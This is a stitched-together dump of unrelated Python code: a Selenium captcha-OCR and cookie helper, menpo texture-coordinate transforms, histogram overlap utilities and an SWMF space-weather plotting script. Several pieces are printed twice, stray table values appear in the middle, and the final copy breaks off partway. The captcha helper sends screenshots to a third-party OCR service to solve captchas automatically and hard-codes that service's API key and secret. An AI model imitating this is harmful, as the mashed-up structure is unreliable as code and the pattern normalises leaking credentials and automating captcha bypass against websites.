    logger.addHandler(f_handler)
    return logger
def get_code(driver, id):
    """Screenshot the element `id`, crop the captcha out of a full-page
    screenshot and OCR it through the showapi web service.

    NOTE(review): the '\\' separators are Windows-only, and the showapi
    appId/secret are hard-coded in source -- move them to configuration.
    """
    # Grab the captcha image region from a full-page screenshot.
    t = time.time()
    path = os.path.dirname(os.path.dirname(__file__)) + '\\screenshots'
    picture_name1 = path + '\\' + str(t) + '.png'
    driver.save_screenshot(picture_name1)
    ce = driver.find_element_by_id(id)
    left = ce.location['x']
    top = ce.location['y']
    right = ce.size['width'] + left
    height = ce.size['height'] + top
    # Hi-DPI pixel ratio: CSS pixels * dpr = physical screenshot pixels.
    dpr = driver.execute_script('return window.devicePixelRatio')
    print(dpr)
    im = Image.open(picture_name1)
    img = im.crop((left*dpr, top*dpr, right*dpr, height*dpr))
    t = time.time()
    picture_name2 = path + '\\' + str(t) + '.png'
    img.save(picture_name2)  # this is the cropped captcha image
    r = ShowapiRequest("http://route.showapi.com/184-4", "290728", "1bd001f23c874581aac4db788a92c71d")
    r.addFilePara("image", picture_name2)
    r.addBodyPara("typeId", "34")
    r.addBodyPara("convert_to_jpg", "0")
    r.addBodyPara("needMorePrecise", "0")
    res = r.post()
    text = res.json()['showapi_res_body']
    code = text['Result']
    return code
# Generate a random string
def gen_random_str():
    """Return an 8-char random string; sample() gives unique characters."""
    rand_str = ''.join(random.sample(string.ascii_letters + string.digits, 8))
    return rand_str
def save_cookie(driver, path):
    """Pickle the browser's current cookie list to `path`."""
    with open(path, 'wb') as filehandler:
        cookies = driver.get_cookies()
        print(cookies)
        pickle.dump(cookies, filehandler)
def load_cookie(driver, path):
    """Read pickled cookies from `path` and install them into the browser."""
    with open(path, 'rb') as src:
        for cookie in pickle.load(src):
            driver.add_cookie(cookie)
import numpy as np
from menpo.transform import Homogeneous, Scale
def tcoords_to_image_coords(image_shape):
    r"""
    Build a :map:`Homogeneous` transform mapping [0, 1] texture coordinates
    (as used on :map:`TexturedTriMesh`) to image coordinates.

    Steps performed, in order: flip the origin from bottom-left to top-left,
    permute st/uv -> yx, then denormalise by the image shape.  Note (1, 1)
    maps to (h - 1, w - 1) because Menpo images are 0-based.

    Parameters
    ----------
    image_shape : `tuple`
        The shape of the texture that the tcoords index in to.

    Returns
    -------
    :map:`Homogeneous`
        Transform taking texture coordinates to image coordinates.
    """
    # Send y=1 -> 0 and y=0 -> 1 (origin moves to the upper left).
    flip_origin = Homogeneous(
        np.array([[1.0, 0.0, 0.0], [0.0, -1.0, 1.0], [0.0, 0.0, 1.0]])
    )
    # Swap the two axes so indexing is (y, x).
    swap_axes = Homogeneous(
        np.array([[0.0, 1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, 1.0]])
    )
    denormalise = Scale(np.array(image_shape) - 1)
    return flip_origin.compose_before(swap_axes).compose_before(denormalise)
def image_coords_to_tcoords(image_shape):
    r"""
    Build a :map:`Homogeneous` transform mapping image coordinates
    (e.g. image landmarks) to [0, 1] texture coordinates (tcoords).

    This is exactly the pseudoinverse of ``tcoords_to_image_coords``:
    normalise by the image shape, permute yx -> st (uv), and flip the
    origin from top-left back to bottom-left.

    Parameters
    ----------
    image_shape : `tuple`
        The shape of the texture that the image coordinates are on.

    Returns
    -------
    :map:`Homogeneous`
        Transform taking image coordinates to texture coordinates.
    """
    forward = tcoords_to_image_coords(image_shape)
    return forward.pseudoinverse()

import numpy as np
from menpo.transform import Homogeneous, Scale
def tcoords_to_image_coords(image_shape):
    r"""
    Build a :map:`Homogeneous` transform mapping [0, 1] texture coordinates
    (as used on :map:`TexturedTriMesh`) to image coordinates.

    Steps performed, in order: flip the origin from bottom-left to top-left,
    permute st/uv -> yx, then denormalise by the image shape.  Note (1, 1)
    maps to (h - 1, w - 1) because Menpo images are 0-based.

    Parameters
    ----------
    image_shape : `tuple`
        The shape of the texture that the tcoords index in to.

    Returns
    -------
    :map:`Homogeneous`
        Transform taking texture coordinates to image coordinates.
    """
    # Send y=1 -> 0 and y=0 -> 1 (origin moves to the upper left).
    flip_origin = Homogeneous(
        np.array([[1.0, 0.0, 0.0], [0.0, -1.0, 1.0], [0.0, 0.0, 1.0]])
    )
    # Swap the two axes so indexing is (y, x).
    swap_axes = Homogeneous(
        np.array([[0.0, 1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, 1.0]])
    )
    denormalise = Scale(np.array(image_shape) - 1)
    return flip_origin.compose_before(swap_axes).compose_before(denormalise)
def image_coords_to_tcoords(image_shape):
    r"""
    Build a :map:`Homogeneous` transform mapping image coordinates
    (e.g. image landmarks) to [0, 1] texture coordinates (tcoords).

    This is exactly the pseudoinverse of ``tcoords_to_image_coords``.

    Parameters
    ----------
    image_shape : `tuple`
        The shape of the texture that the image coordinates are on.

    Returns
    -------
    :map:`Homogeneous`
        Transform taking image coordinates to texture coordinates.
    """
    forward = tcoords_to_image_coords(image_shape)
    return forward.pseudoinverse()
import numpy as np
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
from scipy import stats
import scipy.integrate as integrate
def read_data(file_name):
    """Read a whitespace-separated data file whose first line is a
    '#'-prefixed header; the header names become the DataFrame columns.

    BUGFIX: the original opened the file without closing it (handle leak);
    `with` guarantees closure.  The separator is now a raw string.
    """
    with open(file_name, 'r') as f:
        line1 = f.readline()
        names = line1.replace('#', ' ').split()
        data_read = pd.read_csv(f, sep=r"\s+", names=names, skiprows=0)
    return data_read
def draw_histo(data, field_name, title):
    """Show a 50-bin density histogram of data[field_name] with a fitted
    normal PDF overlaid; prints the fit parameters and returns the axes."""
    fig, ax0 = plt.subplots(ncols=1, nrows=1)
    x_v1, bins_v1, p_v1 = ax0.hist(data[field_name], bins = 50, density=True, label='Histogram')
    # Fit a normal distribution to the samples and evaluate it at bin edges.
    mu_v1, sigma_v1 = stats.norm.fit(data[field_name])
    best_fit_line_v1 = stats.norm.pdf(bins_v1, mu_v1, sigma_v1)
    ax0.plot(bins_v1, best_fit_line_v1, label='$\mu$ = {0:6.3f}\n$\sigma$ = {1:6.3f}'.format(mu_v1, sigma_v1))
    ax0.legend()
    plt.title(title)
    plt.show()
    print("mu = {0}, sigma = {1}".format(mu_v1, sigma_v1))
    return ax0
def draw_histo_multi(data_items, field_name, titles, title, legend=True):
    """Overlay 50-bin density histograms (with normal fits) of the same
    field for several datasets on one axes; `titles` labels each fit line."""
    fig, ax0 = plt.subplots(ncols=1, nrows=1)
    idx = 0
    for data in data_items:
        x_v1, bins_v1, p_v1 = ax0.hist(data[field_name], bins = 50, density=True)
        mu_v1, sigma_v1 = stats.norm.fit(data[field_name])
        best_fit_line_v1 = stats.norm.pdf(bins_v1, mu_v1, sigma_v1)
        ax0.plot(bins_v1, best_fit_line_v1, label=titles[idx])
        idx=idx+1
    if legend:
        ax0.legend()
    plt.title(title)
    plt.show()
def draw_histo_center(data, field_name, title):
    """Show a 100-bin density histogram with the fitted normal PDF evaluated
    at bin *centres* (not edges); returns the axes."""
    fig, ax0 = plt.subplots(ncols=1, nrows=1)
    values, bins, p = ax0.hist(data[field_name], bins = 100, density=True, label='Histogram')
    mu, sigma = stats.norm.fit(data[field_name])
    # Midpoints of consecutive bin edges.
    bin_centers = 0.5*(bins[1:] + bins[:-1])
    pdf = stats.norm.pdf(x = bin_centers, loc=mu, scale=sigma)
    ax0.plot(bin_centers, pdf, label="PDF")
    ax0.legend()
    plt.title(title)
    plt.show()
    print("mu = {0}, sigma = {1}".format(mu, sigma))
    return ax0
def draw_histo_center_multi(data_items, field_name, titles, title, legend = True):
    """Overlay 100-bin density histograms with normal PDFs at bin centres
    for several datasets; `titles` labels each PDF line."""
    fig, ax0 = plt.subplots(ncols=1, nrows=1)
    idx = 0
    for data in data_items:
        values, bins, p = ax0.hist(data[field_name], bins = 100, density=True)
        mu, sigma = stats.norm.fit(data[field_name])
        bin_centers = 0.5*(bins[1:] + bins[:-1])
        pdf = stats.norm.pdf(x = bin_centers, loc=mu, scale=sigma)
        ax0.plot(bin_centers, pdf, label=titles[idx])
        if legend:
            ax0.legend()
        idx += 1
    plt.title(title)
    plt.show()
def get_histo_bins(data, bin_number, field_name):
    """Density-histogram data[field_name] into `bin_number` bins without
    creating any figure.

    Returns (values, bin_edges, patches).  The original instantiated a
    hidden throwaway Axes just to call .hist(); np.histogram computes the
    same values/edges directly.  The patches element is unused by every
    caller and is returned as None.
    """
    values, bins = np.histogram(data[field_name], bins=bin_number, density=True)
    return values, bins, None
def get_histo_bins_bin(data, given_bins, field_name):
    """Density-histogram data[field_name] onto the explicit edges
    `given_bins`, without creating any figure.

    Returns (values, bin_edges, patches); patches is None (unused by all
    callers -- the original built a hidden Axes only to call .hist()).
    """
    values, bins = np.histogram(data[field_name], bins=given_bins, density=True)
    return values, bins, None
def integrate_histo(data, bin_number, field_name):
    """Simpson-integrate the density histogram of data[field_name] over its
    bin centres (close to, but not exactly, 1 for a density histogram).

    BUGFIX: pass `x` by keyword -- positional x was deprecated and then
    removed from scipy.integrate.simpson.
    """
    values, bins, p = get_histo_bins(data, bin_number, field_name)
    bin_centers = 0.5*(bins[1:]+bins[:-1])
    int_value = integrate.simpson(values, x=bin_centers)
    return int_value
def find_bins(small_size, small_bins, big_size, big_bins):
    """Build a list of bin edges with the finer width `small_size`, aligned
    to the grid of `small_bins`, covering the full span of `big_bins`.

    `big_size` is kept for interface compatibility but is not used.
    Returns a plain list of edges.
    """
    # Snap the starting edge onto the small-bin grid at/just below big_bins[0].
    start_idx = np.floor((big_bins[0] - small_bins[0]) / small_size)
    bin_edge = small_bins[0] + start_idx * small_size
    last_big_edge = big_bins[big_bins.size - 1]
    new_bins = [bin_edge]
    # Extend by one small step at a time until the big range is covered.
    while new_bins[-1] < last_big_edge:
        new_bins.append(new_bins[-1] + small_size)
    return new_bins
def merge_bins(bins1, values1, bins2, values2, bin_size):
    """Resample two histograms onto one shared edge grid of width `bin_size`.

    The merged grid runs from the smaller first edge to the larger last edge;
    where a histogram has no bin covering an edge, 0 is appended for it.
    Returns (merged_bins, merged_values1, merged_values2).

    NOTE(review): the value lists can come out shorter than merged_bins; the
    caller (integrate_diff_histo) zero-pads them afterwards -- confirm before
    reusing this helper elsewhere.
    """
    bins1_number = len(bins1)
    bins2_number = len(bins2)
    #print('bins1_number = {0}, values1 size = {1}'.format(bins1_number, len(values1)))
    #print('bins2_number = {0}, values2 size = {1}'.format(bins2_number, len(values2)))
    bins1_start = bins1[0]
    bins1_end = bins1[bins1_number -1]
    bins2_start = bins2[0]
    bins2_end = bins2[bins2_number -1]
    bin_start = min(bins1_start, bins2_start)
    bin_end = max(bins1_end, bins2_end)
    merged_bins = []
    merged_values1 = []
    merged_values2 = []
    bin_edge = bin_start
    bins1_idx = 0
    bins2_idx = 0
    while bin_edge < bin_end:
        merged_bins.append(bin_edge)
        # Outside histogram 1's range -> contribute 0; inside -> copy the
        # next value and advance that histogram's cursor.
        if bin_edge < bins1_start or bin_edge >= bins1_end:
            merged_values1.append(0)
        elif bin_edge < bins1_end and bins1_idx < bins1_number -1:
            merged_values1.append(values1[bins1_idx])
            bins1_idx += 1
        # Same treatment for histogram 2.
        if bin_edge < bins2_start or bin_edge >= bins2_end:
            merged_values2.append(0)
        elif bin_edge < bins2_end and bins2_idx < bins2_number - 1:
            merged_values2.append(values2[bins2_idx])
            bins2_idx += 1
        bin_edge += bin_size
    return merged_bins, merged_values1, merged_values2
def integrate_diff_histo(data1, data2, bin_number, field_name):
    """Confusion factor of two datasets: integrate the pointwise minimum of
    their density histograms (overlap area; 1 = identical distributions).

    Both histograms are first rebinned to the finer of their two bin widths
    and merged onto a common edge grid before integrating with Simpson's rule.
    """
    #print(data1)
    #print(data2)
    values1, bins1, p1 = get_histo_bins(data1, bin_number, field_name)
    values2, bins2, p2 = get_histo_bins(data2, bin_number, field_name)
    #print('bins1 = {0}'.format(bins1))
    #print('bins2 = {0}'.format(bins2))
    bin_size1 = bins1[1] - bins1[0]
    bin_size2 = bins2[1] - bins2[0]
    bin_size = bin_size1
    #print('size 1 = {0}'.format(bin_size1))
    #print('size 2 = {0}'.format(bin_size2))
    # Rebin the coarser histogram onto the finer grid so both share a width.
    if bin_size1 < bin_size2: # recalculate for data2
        new_bins2 = find_bins(bin_size1, bins1, bin_size2, bins2)
        values2, bins2, p2 = get_histo_bins_bin(data2, new_bins2, field_name)
        #print('new_bins2 size = {0}'.format(new_bins2[1]-new_bins2[0]))
        #print('new_bins2 number = {0}, old = {1}'.format(len(new_bins2), len(bins2)))
    elif bin_size1 > bin_size2: # recalculate for data1
        bin_size = bin_size2
        new_bins1 = find_bins(bin_size2, bins2, bin_size1, bins1)
        values1, bins1, p1 = get_histo_bins_bin(data1, new_bins1, field_name)
        #print('new_bins1 size = {0}'.format(new_bins1[1]-new_bins1[0]))
        #print('new_bins1 number = {0}, old = {1}'.format(len(new_bins1), len(bins1)))
    merged_bins, merged_values1, merged_values2 = merge_bins(bins1, values1, bins2, values2, bin_size)
    #print('merged_bins size = {0}'.format(len(merged_bins)))
    #print('merged_values1 size = {0}'.format(len(merged_values1)))
    #print('merged_values2 size = {0}'.format(len(merged_values2)))
    # zero appends: merge_bins can return value lists shorter than the grid.
    if len(merged_values1) < len(merged_bins):
        for idx in range(len(merged_bins)-len(merged_values1)):
            merged_values1.append(0)
    if len(merged_values2) < len(merged_bins):
        for idx in range(len(merged_bins)-len(merged_values2)):
            merged_values2.append(0)
    # Overlap curve: pointwise minimum of the two densities.
    min_values = []
    for idx in range(len(merged_bins)):
        min_values.append(min(merged_values1[idx], merged_values2[idx]))
    #print('min_values size = {0}'.format(len(min_values)))
    confusion = integrate.simpson(min_values, merged_bins)
    #print('confusion = {0}'.format(confusion))
    return confusion
def calc_confusion_factors(names, bins, field_name):
    """Load every file in `names` and return the confusion factor of each
    dataset against the first one (cf_list[0] is the self-confusion)."""
    data_items = [read_data(file_name) for file_name in names]
    reference = data_items[0]
    cf_list = [integrate_diff_histo(reference, item, bins, field_name)
               for item in data_items]
    return cf_list

import numpy as np
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
from scipy import stats
import scipy.integrate as integrate
def read_data(file_name):
    """Read a whitespace-separated data file whose first line is a
    '#'-prefixed header; the header names become the DataFrame columns.

    BUGFIX: the original leaked the file handle; `with` closes it.
    """
    with open(file_name, 'r') as f:
        line1 = f.readline()
        names = line1.replace('#', ' ').split()
        data_read = pd.read_csv(f, sep=r"\s+", names=names, skiprows=0)
    return data_read
def draw_histo(data, field_name, title):
    """Show a 50-bin density histogram with a fitted normal PDF overlaid;
    prints the fit parameters and returns the axes."""
    fig, ax0 = plt.subplots(ncols=1, nrows=1)
    x_v1, bins_v1, p_v1 = ax0.hist(data[field_name], bins = 50, density=True, label='Histogram')
    mu_v1, sigma_v1 = stats.norm.fit(data[field_name])
    best_fit_line_v1 = stats.norm.pdf(bins_v1, mu_v1, sigma_v1)
    ax0.plot(bins_v1, best_fit_line_v1, label='$\mu$ = {0:6.3f}\n$\sigma$ = {1:6.3f}'.format(mu_v1, sigma_v1))
    ax0.legend()
    plt.title(title)
    plt.show()
    print("mu = {0}, sigma = {1}".format(mu_v1, sigma_v1))
    return ax0
def draw_histo_multi(data_items, field_name, titles, title, legend=True):
    """Overlay 50-bin density histograms (with normal fits) of the same
    field for several datasets; `titles` labels each fit line."""
    fig, ax0 = plt.subplots(ncols=1, nrows=1)
    idx = 0
    for data in data_items:
        x_v1, bins_v1, p_v1 = ax0.hist(data[field_name], bins = 50, density=True)
        mu_v1, sigma_v1 = stats.norm.fit(data[field_name])
        best_fit_line_v1 = stats.norm.pdf(bins_v1, mu_v1, sigma_v1)
        ax0.plot(bins_v1, best_fit_line_v1, label=titles[idx])
        idx=idx+1
    if legend:
        ax0.legend()
    plt.title(title)
    plt.show()
def draw_histo_center(data, field_name, title):
    """Show a 100-bin density histogram with the normal PDF evaluated at bin
    centres; returns the axes."""
    fig, ax0 = plt.subplots(ncols=1, nrows=1)
    values, bins, p = ax0.hist(data[field_name], bins = 100, density=True, label='Histogram')
    mu, sigma = stats.norm.fit(data[field_name])
    bin_centers = 0.5*(bins[1:] + bins[:-1])
    pdf = stats.norm.pdf(x = bin_centers, loc=mu, scale=sigma)
    ax0.plot(bin_centers, pdf, label="PDF")
    ax0.legend()
    plt.title(title)
    plt.show()
    print("mu = {0}, sigma = {1}".format(mu, sigma))
    return ax0
def draw_histo_center_multi(data_items, field_name, titles, title, legend = True):
    """Overlay 100-bin density histograms with normal PDFs at bin centres
    for several datasets; `titles` labels each PDF line."""
    fig, ax0 = plt.subplots(ncols=1, nrows=1)
    idx = 0
    for data in data_items:
        values, bins, p = ax0.hist(data[field_name], bins = 100, density=True)
        mu, sigma = stats.norm.fit(data[field_name])
        bin_centers = 0.5*(bins[1:] + bins[:-1])
        pdf = stats.norm.pdf(x = bin_centers, loc=mu, scale=sigma)
        ax0.plot(bin_centers, pdf, label=titles[idx])
        if legend:
            ax0.legend()
        idx += 1
    plt.title(title)
    plt.show()
def get_histo_bins(data, bin_number, field_name):
    """Density-histogram data[field_name] into `bin_number` bins without
    creating any figure.

    Returns (values, bin_edges, patches); patches is None (unused by every
    caller -- the original built a hidden throwaway Axes just for .hist()).
    """
    values, bins = np.histogram(data[field_name], bins=bin_number, density=True)
    return values, bins, None
def get_histo_bins_bin(data, given_bins, field_name):
    """Density-histogram data[field_name] onto the explicit edges
    `given_bins`, without creating any figure.

    Returns (values, bin_edges, patches); patches is None (unused by all
    callers).
    """
    values, bins = np.histogram(data[field_name], bins=given_bins, density=True)
    return values, bins, None
def integrate_histo(data, bin_number, field_name):
    """Simpson-integrate the density histogram of data[field_name] over its
    bin centres.

    BUGFIX: pass `x` by keyword -- positional x was removed from
    scipy.integrate.simpson in recent SciPy releases.
    """
    values, bins, p = get_histo_bins(data, bin_number, field_name)
    bin_centers = 0.5*(bins[1:]+bins[:-1])
    int_value = integrate.simpson(values, x=bin_centers)
    return int_value
def find_bins(small_size, small_bins, big_size, big_bins):
    """Build bin edges with the finer width `small_size`, aligned to the
    grid of `small_bins`, covering the full span of `big_bins`.

    `big_size` is kept for interface compatibility but is unused.
    """
    start_idx = np.floor((big_bins[0] - small_bins[0]) / small_size)
    bin_edge = small_bins[0] + start_idx * small_size
    last_big_edge = big_bins[big_bins.size - 1]
    new_bins = [bin_edge]
    while new_bins[-1] < last_big_edge:
        new_bins.append(new_bins[-1] + small_size)
    return new_bins
def merge_bins(bins1, values1, bins2, values2, bin_size):
    """Resample two histograms onto one shared edge grid of width `bin_size`.

    Edges outside a histogram's range contribute 0 for that histogram.
    Returns (merged_bins, merged_values1, merged_values2); the value lists
    may be shorter than merged_bins -- the caller zero-pads them.
    """
    bins1_number = len(bins1)
    bins2_number = len(bins2)
    #print('bins1_number = {0}, values1 size = {1}'.format(bins1_number, len(values1)))
    #print('bins2_number = {0}, values2 size = {1}'.format(bins2_number, len(values2)))
    bins1_start = bins1[0]
    bins1_end = bins1[bins1_number -1]
    bins2_start = bins2[0]
    bins2_end = bins2[bins2_number -1]
    bin_start = min(bins1_start, bins2_start)
    bin_end = max(bins1_end, bins2_end)
    merged_bins = []
    merged_values1 = []
    merged_values2 = []
    bin_edge = bin_start
    bins1_idx = 0
    bins2_idx = 0
    while bin_edge < bin_end:
        merged_bins.append(bin_edge)
        # Outside histogram 1 -> 0; inside -> next value, advance cursor.
        if bin_edge < bins1_start or bin_edge >= bins1_end:
            merged_values1.append(0)
        elif bin_edge < bins1_end and bins1_idx < bins1_number -1:
            merged_values1.append(values1[bins1_idx])
            bins1_idx += 1
        # Same treatment for histogram 2.
        if bin_edge < bins2_start or bin_edge >= bins2_end:
            merged_values2.append(0)
        elif bin_edge < bins2_end and bins2_idx < bins2_number - 1:
            merged_values2.append(values2[bins2_idx])
            bins2_idx += 1
        bin_edge += bin_size
    return merged_bins, merged_values1, merged_values2
def integrate_diff_histo(data1, data2, bin_number, field_name):
    """Confusion factor of two datasets: the integral of the pointwise
    minimum of their density histograms (overlap area; 1 = identical).

    Both histograms are rebinned to the finer bin width and merged onto a
    common grid before Simpson integration.
    """
    #print(data1)
    #print(data2)
    values1, bins1, p1 = get_histo_bins(data1, bin_number, field_name)
    values2, bins2, p2 = get_histo_bins(data2, bin_number, field_name)
    #print('bins1 = {0}'.format(bins1))
    #print('bins2 = {0}'.format(bins2))
    bin_size1 = bins1[1] - bins1[0]
    bin_size2 = bins2[1] - bins2[0]
    bin_size = bin_size1
    #print('size 1 = {0}'.format(bin_size1))
    #print('size 2 = {0}'.format(bin_size2))
    # Rebin the coarser histogram onto the finer grid.
    if bin_size1 < bin_size2: # recalculate for data2
        new_bins2 = find_bins(bin_size1, bins1, bin_size2, bins2)
        values2, bins2, p2 = get_histo_bins_bin(data2, new_bins2, field_name)
        #print('new_bins2 size = {0}'.format(new_bins2[1]-new_bins2[0]))
        #print('new_bins2 number = {0}, old = {1}'.format(len(new_bins2), len(bins2)))
    elif bin_size1 > bin_size2: # recalculate for data1
        bin_size = bin_size2
        new_bins1 = find_bins(bin_size2, bins2, bin_size1, bins1)
        values1, bins1, p1 = get_histo_bins_bin(data1, new_bins1, field_name)
        #print('new_bins1 size = {0}'.format(new_bins1[1]-new_bins1[0]))
        #print('new_bins1 number = {0}, old = {1}'.format(len(new_bins1), len(bins1)))
    merged_bins, merged_values1, merged_values2 = merge_bins(bins1, values1, bins2, values2, bin_size)
    #print('merged_bins size = {0}'.format(len(merged_bins)))
    #print('merged_values1 size = {0}'.format(len(merged_values1)))
    #print('merged_values2 size = {0}'.format(len(merged_values2)))
    # zero appends: merge_bins can return value lists shorter than the grid.
    if len(merged_values1) < len(merged_bins):
        for idx in range(len(merged_bins)-len(merged_values1)):
            merged_values1.append(0)
    if len(merged_values2) < len(merged_bins):
        for idx in range(len(merged_bins)-len(merged_values2)):
            merged_values2.append(0)
    # Overlap curve: pointwise minimum of the two densities.
    min_values = []
    for idx in range(len(merged_bins)):
        min_values.append(min(merged_values1[idx], merged_values2[idx]))
    #print('min_values size = {0}'.format(len(min_values)))
    confusion = integrate.simpson(min_values, merged_bins)
    #print('confusion = {0}'.format(confusion))
    return confusion
def calc_confusion_factors(names, bins, field_name):
    """Histogram-overlap ("confusion") factor of every file against the first.

    Args:
        names: iterable of file paths readable by read_data().
        bins: bin count forwarded to integrate_diff_histo().
        field_name: field of the data to histogram.

    Returns:
        list of confusion factors, one per file; element 0 compares the
        first file with itself.
    """
    cf_list = []
    data_items = []
    # Load every file up front so each one is read exactly once.
    for file_name in names:
        data = read_data(file_name)
        #print("file_name = {0}, data_mean = {1}".format(file_name, np.mean(data)))
        data_items.append(data)
    # Compare every dataset against the first one (the reference).
    for idx in range(len(data_items)):
        cf = integrate_diff_histo(data_items[0], data_items[idx], bins, field_name)
        cf_list.append(cf)
    return cf_list | 0.213213 | 0.511107 |
import spacepy
import spacepy.pybats.bats as bts
import sys
sys.path.append('/Users/sgraf/Desktop/SWMFtools')
sys.path.append('/Users/sgraf/Desktop/SWMFtools/dBdt')
import util
import matplotlib.pyplot as plt
import matplotlib
import supermag_parser
import spacepy.plot as splot
# Apply the spacepy plot style, then force opaque white legend boxes.
splot.style('spacepy')
plt.rcParams["legend.frameon"] = True
plt.rcParams["legend.facecolor"] = 'white'
def results_summary_update(log, geolog, show=True):
    """3-panel summary plot from log and geoindex files

    Panels (top to bottom): AU/AL, Kp, Dst; the two upper panels are twice
    the height of the Dst panel and all three share the time axis.  The
    model curves are drawn in red and labelled 'Unsmoothed', with
    observations overlaid.

    Args:
        log: log file object providing add_dst_quicklook().
        geolog: geoindex file object providing add_ae_quicklook() and
            add_kp_quicklook().
        show: if True, display the figure interactively before returning.

    Returns:
        (fig, axes): the matplotlib figure and its three axes.
    """
    fig, axes = plt.subplots(figsize=(10,10),nrows=3, ncols=1, sharex=True,gridspec_kw={'height_ratios': [2, 2, 1]})
    geolog.add_ae_quicklook(val='AU', plot_obs=True, target=axes[0], label='Unsmoothed',c='r')
    # AL shares the AU axis; its label is suppressed to avoid a duplicate
    # legend entry.
    geolog.add_ae_quicklook(val='AL', plot_obs=True, target=axes[0],label=None, c='r')
    geolog.add_kp_quicklook(plot_obs=True, target=axes[1], label='Unsmoothed',c='r')
    log.add_dst_quicklook(plot_obs=True, target=axes[2], label='Unsmoothed',c='r')
    # Only the bottom (shared) x-axis keeps its label.
    axes[0].set_xlabel('')
    axes[1].set_xlabel('')
    if show:
        plt.show()
    return fig, axes
dates = ['20061214','20010830','20050831','20100405','20110805','20150316']

# For each storm event: load the unsmoothed, 30-minute and hourly model runs
# and overlay their AU/AL, Kp and Dst curves on one summary figure per event.
for date in dates:
    hour_logs = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/hour/'.format(date))
    orig_logs = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/unsmoothed/'.format(date))
    thirty_logs = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/30min/'.format(date))
    thirty_geo = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/30min'.format(date),logtype='geo')
    hour_geo = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/hour/'.format(date),logtype='geo')
    orig_geo = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/unsmoothed/'.format(date),logtype='geo')
    # Base figure: unsmoothed run in red (drawn by results_summary_update).
    fig, axes = results_summary_update(orig_logs,orig_geo,show=False)
    hour_geo.add_ae_quicklook(val='AU', plot_obs=False, target=axes[0], label='Hourly', c='b')
    # NOTE(review): label='Test' looks like leftover debugging -- every other
    # AL overlay uses label=None -- confirm (the axes[0] legend is removed
    # below, so it is not user-visible either way).
    hour_geo.add_ae_quicklook(val='AL', plot_obs=False, target=axes[0],label='Test', c='b')
    hour_geo.add_kp_quicklook(plot_obs=False, target=axes[1], label='Hourly',c='b')
    hour_logs.add_dst_quicklook(plot_obs=False, target=axes[2], label='Hourly',c='b')
    thirty_geo.add_ae_quicklook(val='AU', plot_obs=False, target=axes[0], label='30min',c='g')
    thirty_geo.add_ae_quicklook(val='AL', plot_obs=False, target=axes[0],label=None,c='g')
    thirty_geo.add_kp_quicklook(plot_obs=False, target=axes[1], label='30min',c='g')
    thirty_logs.add_dst_quicklook(plot_obs=False, target=axes[2], label='30min',c='g')
    # Drop the AU/AL and Dst legends; only the Kp panel keeps one.
    axes[0].get_legend().remove()
    axes[2].get_legend().remove()
    axes[0].set_ylabel('AU/AL (nT)')
    fig.suptitle('Summary Plot')
    fig.subplots_adjust(top=0.88)
    #plt.show()
    plt.savefig('{}_au_al_summary_plot_overlay.png'.format(date))
    #fig, axes = results_summary_update(hour_logs,hour_geo,show=False)
    #fig.suptitle('Hourly Smoothed Summary Plot')
    #fig.subplots_adjust(top=0.88)
    #plt.savefig('{}_au_al_summary_plot_hourly.png'.format(date))
    #fig, axes = results_summary_update(thirty_logs,thirty_geo,show=False)
    #fig.suptitle('30min Smoothed Summary Plot')
    #fig.subplots_adjust(top=0.88)
    #plt.savefig('{}_au_al_summary_plot_30min.png'.format(date))

# Disabled scratch blocks below (kept verbatim as inert string literals).
'''
diff_dst = orig_logs['dst_sm'] - hour_logs['dst_sm']
fig, axes = plt.subplots(nrows=3, ncols=1, sharex=True)
orig_logs.add_dst_quicklook(plot_obs=True, target=axes[0])
hour_logs.add_dst_quicklook(plot_obs=True, target=axes[1])
axes[2].plot(orig_logs['time'],diff_dst)
axes[0].set_title('Dst of Unsmoothed Data')
axes[1].set_title('Dst of Hourly Smoothed Data')
axes[2].set_title('Difference between unsmoothed and hourly Dst')
fig.tight_layout()
'''

'''
fig,ax = plt.subplots()
ax.plot(orig_logs.obs_dst['time'], orig_logs.obs_dst['dst'], '--',color='black',label='Observed DST')
ax.plot(orig_logs['time'], orig_logs['dst_sm'],label='Unsmoothed DST')
ax.plot(hour_logs['time'], hour_logs['dst_sm'],label='Hourly DST')
plt.xlim(hour_logs['time'][0], hour_logs['time'][-1])
leg = ax.legend()
''' | code/results_look.py | import spacepy
import spacepy.pybats.bats as bts
import sys
sys.path.append('/Users/sgraf/Desktop/SWMFtools')
sys.path.append('/Users/sgraf/Desktop/SWMFtools/dBdt')
import util
import matplotlib.pyplot as plt
import matplotlib
import supermag_parser
import spacepy.plot as splot
# Apply the spacepy plot style, then force opaque white legend boxes.
splot.style('spacepy')
plt.rcParams["legend.frameon"] = True
plt.rcParams["legend.facecolor"] = 'white'
def results_summary_update(log, geolog, show=True):
    """3-panel summary plot from log and geoindex files

    Panels (top to bottom): AU/AL, Kp, Dst, sharing the time axis; model
    curves are drawn in red ('Unsmoothed') with observations overlaid.

    Args:
        log: log file object providing add_dst_quicklook().
        geolog: geoindex file object providing add_ae_quicklook() and
            add_kp_quicklook().
        show: if True, display the figure interactively before returning.

    Returns:
        (fig, axes): the matplotlib figure and its three axes.
    """
    fig, axes = plt.subplots(figsize=(10,10),nrows=3, ncols=1, sharex=True,gridspec_kw={'height_ratios': [2, 2, 1]})
    geolog.add_ae_quicklook(val='AU', plot_obs=True, target=axes[0], label='Unsmoothed',c='r')
    # AL shares the AU axis; label suppressed to avoid a duplicate entry.
    geolog.add_ae_quicklook(val='AL', plot_obs=True, target=axes[0],label=None, c='r')
    geolog.add_kp_quicklook(plot_obs=True, target=axes[1], label='Unsmoothed',c='r')
    log.add_dst_quicklook(plot_obs=True, target=axes[2], label='Unsmoothed',c='r')
    # Only the bottom (shared) x-axis keeps its label.
    axes[0].set_xlabel('')
    axes[1].set_xlabel('')
    if show:
        plt.show()
    return fig, axes
dates = ['20061214','20010830','20050831','20100405','20110805','20150316']

# For each storm event: load the unsmoothed, 30-minute and hourly model runs
